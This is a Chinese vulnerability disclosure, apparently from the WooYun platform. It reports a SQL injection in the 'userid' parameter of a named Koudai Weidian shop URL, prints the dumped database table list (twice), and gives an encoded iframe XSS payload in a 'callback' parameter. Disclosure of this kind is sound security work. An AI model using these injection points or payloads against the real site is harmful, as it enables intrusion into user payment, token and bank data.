2014-05-22:细节已通知厂商并且等待厂商处理中
2014-05-27:厂商已经主动忽略漏洞,细节向公众公开
口袋购物微店站点存在sql注入、跨站等。
详细说明:注入点:http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402
userid存在注入
+-------------------------+
| account_statistics |
| account_type |
| active |
| address |
| address_book |
| admin_contact |
| android_info |
| black_list |
| bmb_task |
| buyer_action |
| buyer_identity |
| buyer_info |
| buyer_note |
| buyer_ua |
| cate_info |
| cate_item |
| complaint |
| csc_task |
| csc_task_process |
| custom |
| custom_detail |
| custom_group |
| custom_order |
| express_info |
| express_note |
| express_state_info |
| friend_dynamic |
| gps |
| ios_info |
| item_bg_category |
| item_info |
| item_sku |
| item_souce |
| login_info |
| market_apply |
| market_record |
| market_seller_item |
| market_user |
| offer_price |
| order_chargeback |
| order_desc_info |
| order_discount |
| order_fr |
| order_fr_info |
| order_info |
| order_pay |
| order_refund |
| order_status_history |
| order_warrant |
| pay_batch_no |
| pay_commission_batch_no |
| pay_commission_note |
| pay_detail |
| pay_history |
| pay_note |
| pay_seller_id |
| pay_task |
| pay_withdrawals_num |
| phone_valid |
| role_action |
| role_info |
| seal_off |
| sell_summary |
| shop_friend |
| sms_log |
| summary_info |
| tb_move_status |
| unpay_detail |
| unpay_list |
| unpay_order |
| update_bank_num |
| user_action |
| user_bank |
| user_device |
| user_discount |
| user_feedback |
| user_info |
| user_key |
| user_token |
| user_truename_note |
| user_union |
| user_union_msg |
| user_wallet |
| user_wallet_workflow |
| web_feedback |
| web_notice |
| white_list |
| wholesale_info |
+-------------------------+
注入点:http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402
userid存在注入
+-------------------------+
| account_statistics |
| account_type |
| active |
| address |
| address_book |
| admin_contact |
| android_info |
| black_list |
| bmb_task |
| buyer_action |
| buyer_identity |
| buyer_info |
| buyer_note |
| buyer_ua |
| cate_info |
| cate_item |
| complaint |
| csc_task |
| csc_task_process |
| custom |
| custom_detail |
| custom_group |
| custom_order |
| express_info |
| express_note |
| express_state_info |
| friend_dynamic |
| gps |
| ios_info |
| item_bg_category |
| item_info |
| item_sku |
| item_souce |
| login_info |
| market_apply |
| market_record |
| market_seller_item |
| market_user |
| offer_price |
| order_chargeback |
| order_desc_info |
| order_discount |
| order_fr |
| order_fr_info |
| order_info |
| order_pay |
| order_refund |
| order_status_history |
| order_warrant |
| pay_batch_no |
| pay_commission_batch_no |
| pay_commission_note |
| pay_detail |
| pay_history |
| pay_note |
| pay_seller_id |
| pay_task |
| pay_withdrawals_num |
| phone_valid |
| role_action |
| role_info |
| seal_off |
| sell_summary |
| shop_friend |
| sms_log |
| summary_info |
| tb_move_status |
| unpay_detail |
| unpay_list |
| unpay_order |
| update_bank_num |
| user_action |
| user_bank |
| user_device |
| user_discount |
| user_feedback |
| user_info |
| user_key |
| user_token |
| user_truename_note |
| user_union |
| user_union_msg |
| user_wallet |
| user_wallet_workflow |
| web_feedback |
| web_notice |
| white_list |
| wholesale_info |
+-------------------------+
另外callback参数也没做好过滤
http://wd.koudai.com/wd/cate/getList?callback=jsonpcallback_1400737646118_061060125241056085%22%27%3E%3C%2Fiframe%3E%3CIFRAME+SRC%3D%22www.baidu.com%22%3E&ver=51402¶m=123
做好过滤,你们懂的
版权声明:转载请注明来源 0x334@乌云 漏洞回应 厂商回应:危害等级:无影响厂商忽略
忽略时间:2014-05-22 16:42
厂商回复: 最新状态:暂无